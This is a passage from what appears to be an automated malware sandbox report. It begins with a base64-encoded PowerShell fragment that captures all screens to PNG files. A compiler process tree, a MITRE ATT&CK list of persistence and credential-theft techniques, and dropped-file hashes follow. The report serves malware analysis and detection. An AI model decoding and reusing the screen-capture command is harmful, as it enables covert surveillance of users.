ACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=2⤵PID:3536
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gosw5ca4\gosw5ca4.cmdline"3⤵PID:4504
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3629.tmp" "c:\Users\Admin\AppData\Local\Temp\gosw5ca4\CSC8EFDAFC34395444BA98E25CAD7262DF9.TMP"4⤵PID:1988
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
1Obfuscated Files or Information
1Command Obfuscation
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
4Credentials In Files
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
10KB
MD5a0825be748bd02ea9763897d54d44c51
SHA1fecab029f931676e449f07bb9e107cfee5764e16
SHA256b5ff4e5160b86fc3fff67edba5faaa2ca17b403d01d197097d3a0e2e3cc4b981
SHA51239e991163faaec625e3588e932c8452b36936dc5a8830d83924b6b10b82bc72ce9b07b2c9835ce7a205d6e5a90c24d258b968fd894bd32ce7ac5ee9bf637c7b2
-
Filesize
152B
MD504b60a51907d399f3685e03094b603cb
SHA1228d18888782f4e66ca207c1a073560e0a4cc6e7
SHA25687a9d9f1bd99313295b2ce703580b9d37c3a68b9b33026fdda4c2530f562e6a3
SHA5122a8e3da94eaf0a6c4a2f29da6fec2796ba6a13cad6425bb650349a60eb3204643fc2fd1ab425f0251610cb9cce65e7dba459388b4e00c12ba3434a1798855c91
-
Filesize
152B
MD59622e603d436ca747f3a4407a6ca952e
SHA1297d9aed5337a8a7290ea436b61458c372b1d497
SHA256ace0e47e358fba0831b508cd23949a503ae0e6a5c857859e720d1b6479ff2261
SHA512f774c5c44f0fcdfb45847626f6808076dccabfbcb8a37d00329ec792e2901dc59636ef15c95d84d0080272571542d43b473ce11c2209ac251bee13bd611b200a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize744B
MD5f06155b76ee2b7fb45ad86dfbe3b888d
SHA15cb7165114e714955505967d1f67a2688886a8ce
SHA256abe4c32e9314cf4e13f71d2873adb38bcf96ebe9efb4faace8bfaf376c8867ec
SHA51201e010496e41f2bdca61b2db7126cd68b7e80af0ddd1d8ed21dadd7d55eb1b97ebeed7fac5e8b008a99d440dd80cda8d988c18e3ef3f9892e4ff46c8b736b913
-
Filesize
124KB
MD52034521d0cd05458143e478e9c46d517
SHA168f2ccd3b77ff53168682db0b779ef206b9af3fb
SHA256acf23ab2b217b63c756733dabb98cc695f885c754793d4b59ba01f9ef73cc448
SHA512e6b7947d63f6fcc7e8b3f0459818b173ccc9c9ba3a0a21f8ee40d84d765a2a190ab98980436c1bc8ba84f78cebef07296b52fbb4492512f246ffd8bfa5c62061
-
Filesize
748B
MD56317d6359252cf4a434f3ceb3488aa9b
SHA1109ed3fe45e989474b883f11c4fac256b0c80cad
SHA256a2f85801876b3235a47c8bed5acfef36da06e258e4b9c82b06810eccdf37e583
SHA5129078067f7b417b95409feb9ab1088c1ff6e22a5963de5463b7863853999a91aa4642ad140a3d6594b75fa3d1d5b72df71ec3d07c2bed09318b0ef636c8255db4
-
Filesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
Filesize
4KB
MD5adb8ac08e031dc67b7af678fa75b9955
SHA11ca7537fef72cf4f772b5288720edbad4fdb1543
SHA2568ce8d0a915026a9a17f9d24ccf14b86766d82ad3e3826d720a2698790dd000d7
SHA5126e24f72e28fd808e09130764580c46f8bf7325085dde0b1d3d8e3fc5bc24259ee366bcd4e597fe24ca8ec667fbc4c87effac0943f67e65d5b280b1c657fbaad6
-
Filesize
5KB
MD59466b44f2de1ba06383f5bf1dd54b0fb
SHA173bdd12300caefb3461c828f75754a80ce4d3214
SHA256b6fe961974c8425988ddff0534d4e2f5bba1b2b5f0faf2ba9c0be2cb6c49614a
SHA512635bf7ee72e16c780dc69097352f58894581730aa98bf363d29d85c2a5d71aea5f470803d2ecae1d6df3428e560e0c2b8ee79b72112296bbbfe4a48f95d38054
-
Filesize
8KB
MD59c8a149d5c6f035f441ad6d648516707
SHA1a9878160083aeb39fd6656e38b8c8f34ee16174b
SHA25675bbcc6561fd923aa50a41236d106bc1685bd0bb8214d1bbbb6878729cc76e08
SHA51293e7728c3c1f2b84a75b9e05a4cfbee3097627faa735005cbcc28efc2d48f37e0e27a714913c13a93fce18c3bebd9831780a251be57b6b3520b1f2f2977fa877
-
Filesize
9KB
MD50a6e7707bed776a0efca965f862bbfee
SHA121ab702381cca362b5d37580fadf81696f777bb0
SHA256cd8acb120b3c2e904f672e81c7de83afa867200b79203b777808c16ad95964e3
SHA5129b12c10cc5b58ac8132eadc1af56c6c656ec968462a7957d1d2c55a6349f0fbabf32082c7e8ea1379753537c00e09ed59094e2602211c86932571606a29d2f94
-
Filesize
10KB
MD5ae9cf37699d5b5cec1a4eac34926a4d4
SHA141036b74234a6d66be662a148cd9e82cba29e149
SHA256349be63d0cf9d941f584cca4d2f2a8325d74a799e63471abdd51c8b9f7399a47
SHA512eab4ba50fb5ba370392c30a5c7c58589730e3172dc1d9090130cde2a0446243d62c930d96ae43e8f3e9819aba07125d59fa99d6170ca1acfba03fc06cef45bb0
-
Filesize
10KB
MD50a72bc98dcd2ee5a027e2d0f7b550bb3
SHA1bf6d422cc580d0d3d8b8f3409c850abe3311120c
SHA256786b2fc58b7289fc72fc467e4019d463fa4378dd25f174f6e27443de61ae9a89
SHA51234af1af26afeef19da9e676b47983501dfd2809bad5f17da7f1565534ca7a02c708fe5ddd34e425ccbd6f967fa23d27f4ce6c64a6c1c2927f23e31ea784a0120
-
Filesize
944B
MD5a8e8360d573a4ff072dcc6f09d992c88
SHA13446774433ceaf0b400073914facab11b98b6807
SHA256bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b
SHA5124ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe
-
Filesize
944B
MD567e8893616f805af2411e2f4a1411b2a
SHA139bf1e1a0ddf46ce7c136972120f512d92827dcd
SHA256ca0dfe104c1bf27f7e01999fcdabc16c6400c3da937c832c26bdbca322381d31
SHA512164e911a9935e75c8be1a6ec3d31199a16ba2a1064da6c09d771b2a38dd7fddd142301ef55d67d90f306d3a454a1ce7b72e129ea42e44500b9b8c623a8d98b4d
-
Filesize
1KB
MD5bd327af902605a30d23bb8cfc4956fa2
SHA155a14b8139716673aa50eb47aec0908309e6dc82
SHA2563ce7d03366112d537dbf31dcd475b229c7376567aad73146c5228c1c340b1278
SHA512cdbc936dd976871f7b56065b75a8ea7995d0ae27361481cdad2037217ff37c3914ba0642b2622b629ece3dc0145470adf13df7adfa2ee51c28ba435753679dc9
-
Filesize
259KB
MD5c50ae4826126a0e7045e82ed25f5612a
SHA199b0670e3a77f9e25df470ade2a5308de9d956e2
SHA25688617c6349204e52055b591b907c38d8c3777b6f7a09874ad3e0aba8698f3b55
SHA512aa5c211a8e2fd4519b17449e927e843c8bd675898f9eaa0d099553e509b6528be536c60612725961a62e82eb8d108d5508c197754fce26dc6ef286ceb7445a15
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD583f7ac622d437ff55afdb341006e6655
SHA108d8422157844c4628491a629d4901b4243a53f9
SHA256086147d353088d38f58d5368bebe76dd5018f280a5532d0558986a1be2bb550b
SHA51241d573cd9bad5798671294c5289d3b9bc965fc50cf963127605e4cfea9610349c9a5766ca1e639c1030dbfb16ec99200936609f6b7f1a513bcaa0e811f295ee0
-
Filesize
7.5MB
MD521506d74ea85e069149fb91841b208a9
SHA1aec0fb6fb1da151852af525e86016809592e84df
SHA2563612f91929b87d68b5059d930dd5fee68461c743577c70b2cb501f4016b4aa8c
SHA5122ce98f5c47ee544027a58e6821a0af822a053ea0d5295722f82b82e991c781ca7cc9999837fb7955e873b048a29983acf4a783ca9c250971b1bc0baeb8287641
-
Filesize
14.2MB
MD567a0a960f47058f0b38ea5d9fceb7ecf
SHA1c200a22c4d1639e8a5803d435e45a8ab94331a49
SHA256aea122a1e7b8965189f58fdfd773edc9d245b3ebd87f68750e71cdae665cb679
SHA512d7ecd2d0bea1060bfb60d3b1b98959f8ff8d40224cfa5e224b460a6d0712d870439e0a753fce6600e0652606e817aa51ddd75c592a2cdda810e0cb4808b60f24
-
Filesize
2KB
MD56e2386469072b80f18d5722d07afdc0b
SHA1032d13e364833d7276fcab8a5b2759e79182880f
SHA256ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075
SHA512e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb
-
Filesize
652B
MD59aeeb9e9f37057cdb9a817fada2366f8
SHA158c67a677679f84d387221fea1564efb42040a63
SHA256d4370b15d9dd5936d2bdd7429e9bec0aac87e434a258aab4273e1b2b4304811b
SHA5123089bf01e75e981eee40863c5c6314d2a10997d0e352aec8734fcc37a096f0d775c93186f731a55f591937afe021b7f95e61066a5fbbc96e634788101b5ded8b
-
Filesize
1004B
MD5c76055a0388b713a1eabe16130684dc3
SHA1ee11e84cf41d8a43340f7102e17660072906c402
SHA2568a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA51222d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2
-
Filesize
607B
MD5fa11b566e1278a7d6f1dcd9cfea779ac
SHA1f9e2ca4919bee8905c5a5b9d0e175433992b0283
SHA256e573f9c1a5a79dd74cb3dc1a374085591f5b67baaf311db996829b6e3692263f
SHA5129ced3cf86859fb017bf9dc0d55e184fa9745251746f3d485effc598a36030aaba7526a93f768e983866a7b3e5a4991d82b6a341d32a555ca60fcbe676d8a2d8e